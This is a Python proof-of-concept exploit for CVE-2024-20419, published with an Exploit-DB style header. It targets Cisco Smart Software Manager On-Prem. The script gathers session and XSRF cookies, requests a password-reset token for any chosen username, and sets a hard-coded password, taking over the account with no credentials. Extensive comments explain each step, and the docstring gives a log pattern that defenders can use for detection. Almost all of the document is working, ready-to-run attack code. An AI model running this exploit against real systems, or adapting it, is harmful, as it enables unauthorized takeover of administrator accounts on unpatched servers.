# Exploit Title: Cisco Smart Software Manager On-Prem 8-202206 - Account Takeover
# Google Dork: N/A
# Date: 21/07/2024
# Exploit Author: Mohammed Adel
# Vendor Homepage: https://www.cisco.com
# Software Link: https://www.cisco.com/c/en/us/products/collateral/cloud-systems-management/smart-software-manager-satellite/datasheet-c78-734539.html
# Version: 8-202206 and earlier
# Tested on: Kali Linux
# CVE : CVE-2024-20419
# Security Advisory: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cssm-auth-sLw3uhUy
# Technical Analysis: https://www.0xpolar.com/blog/CVE-2024-20419

"""Proof of concept for CVE-2024-20419 (Cisco SSM On-Prem password reset).

Flow as implemented below: a GET collects the ``_lic_engine_session`` and
``XSRF-TOKEN`` cookies, a POST to ``/backend/reset_password/generate_code``
is expected to return an ``auth_token`` for the requested ``uid``, and a POST
to ``/backend/reset_password`` submits a new password together with that
token. The script supplies no credential at any point; only the cookies from
the first GET are replayed. It reads exactly two positional arguments (target
base URL, username) and uses the hard-coded ``password`` constant as the new
password.

Defensive note: the three request paths above, issued in that order from one
session without a preceding login, are the pattern to look for in web server
or reverse-proxy logs on hosts that have not applied the fix referenced in the
Cisco advisory linked in the header.
"""

import requests, sys
from urllib.parse import unquote

# Silences the urllib3 warning that each verify=False request below would
# otherwise emit; TLS certificate validation is disabled for the whole run.
requests.packages.urllib3.disable_warnings()

# Positional arguments are read without a length check, so invoking the
# script with fewer than two arguments raises IndexError before any output.
Domain = sys.argv[1] # Domain, https://0xpolar.com:8443
Username = sys.argv[2] # Username, by default it's [admin]
# Fixed replacement password; it is echoed to stdout on success.
password = "Polar@123456780"

print("[*] Cisco Smart Software Manager On-Prem")
print("[*] Account Takeover Exploit")
print("[*] Target: "+Domain)
print("[*] Username: "+Username)
print("\n")
print("[*] Getting Necessary Tokens..")

# Step 1: a GET whose only use here is the Set-Cookie header of the reply.
# The hostname query value is never referenced again by this script.
# No status-code check is made; a failed request is only noticed later,
# when the expected cookies turn out to be missing.
get_url = Domain+"/backend/settings/oauth_adfs?hostname=polar"
response = requests.get(get_url, verify=False)

def get_cookie_value(headers, cookie_name: str) -> "str | None":
    """Pull the value of *cookie_name* out of the Set-Cookie header in *headers*.

    Returns the raw value (still percent-encoded) or None when no Set-Cookie
    entry mentions the name. The header is split on ',' — presumably because
    requests folds repeated Set-Cookie headers into one comma-joined value —
    so a cookie attribute that itself contains a comma (an Expires date, for
    example) would be cut apart. ``cookie_name in ...`` is a substring test,
    so a name that is a prefix or suffix of another cookie's name can match
    the wrong entry, and ``split('=')[1]`` keeps only the text between the
    first and second '=' and raises IndexError for a matching part that has
    no '='. NOTE(review): the two cookie names used below are assumed not to
    collide with other cookies the server sets; not verified here.
    """
    cookies = headers.get('Set-Cookie', '').split(',')
    for cookie in cookies:
        if cookie_name in cookie:
            parts = cookie.split(';')
            for part in parts:
                if cookie_name in part:
                    return part.split('=')[1].strip()
    return None

# Assigned but never referenced again.
set_cookie_headers = response.headers.get('Set-Cookie', '')
xsrf_token = get_cookie_value(response.headers, 'XSRF-TOKEN')
lic_engine_session = get_cookie_value(response.headers, '_lic_engine_session')

# The XSRF cookie is percent-decoded before being reused as a header value.
if xsrf_token:
    xsrf_token = unquote(xsrf_token)

if not lic_engine_session or not xsrf_token:
    # Either cookie missing ends the run here; the exit status is still 0.
    print("Required cookies not found in the response.")
else:
    print("[+] lic_engine_session: "+lic_engine_session)
    print("[+] xsrf_token: "+xsrf_token)
    print("\n[*] Generating Auth Token")
    # Step 2: request a reset token for Username. The session cookie and the
    # XSRF token are replayed as cookie and header; nothing else identifies
    # the caller. The Sec-Ch-Ua headers are presumably browser mimicry —
    # nothing visible here depends on them.
    post_url = Domain+"/backend/reset_password/generate_code"
    headers = {
        'Accept': 'application/json',
        'Content-Type': 'application/json',
        'X-Xsrf-Token': xsrf_token,
        'Sec-Ch-Ua': '',
        'Sec-Ch-Ua-Mobile': '?0',
    }
    cookies = {
        '_lic_engine_session': lic_engine_session,
        'XSRF-TOKEN': xsrf_token,
    }
    payload = {
        'uid': Username
    }
    post_response = requests.post(post_url, headers=headers, cookies=cookies, json=payload, verify=False)
    # .json() raises when the body is not JSON (an HTML error page, say);
    # that case is unhandled. A JSON body without 'auth_token' is reported.
    post_response_json = post_response.json()
    auth_token = post_response_json.get('auth_token')
    if not auth_token:
        print("auth_token not found in the response.")
    else:
        print("[+] Auth Token: "+auth_token)
        print("\n[*] Setting Up a New Password")
        # Step 3: submit the new password with the token from step 2, using
        # the same cookies and XSRF header. common_name is sent empty.
        final_post_url = Domain+"/backend/reset_password"
        final_headers = {
            'Accept': 'application/json',
            'Content-Type': 'application/json',
            'X-Xsrf-Token': xsrf_token,
        }
        final_cookies = {
            '_lic_engine_session': lic_engine_session,
            'XSRF-TOKEN': xsrf_token,
        }
        final_payload = {
            'uid': Username,
            'auth_token': auth_token,
            'password': password,
            'password_confirmation': password,
            'common_name': ''
        }
        final_post_response = requests.post(final_post_url, headers=final_headers, cookies=final_cookies, json=final_payload, verify=False)
        response_text = final_post_response.text
        # Success is inferred from the substring "OK" anywhere in the body,
        # not from the status code, so an unrelated body that happens to
        # contain "OK" is also reported as success.
        if "OK" in response_text:
            print("[+] Password Successfully Changed!")
            print("[+] Username: "+Username)
            print("[+] New Password: "+password)
        else:
            print("[!] Something Went Wrong")
            print(response_text)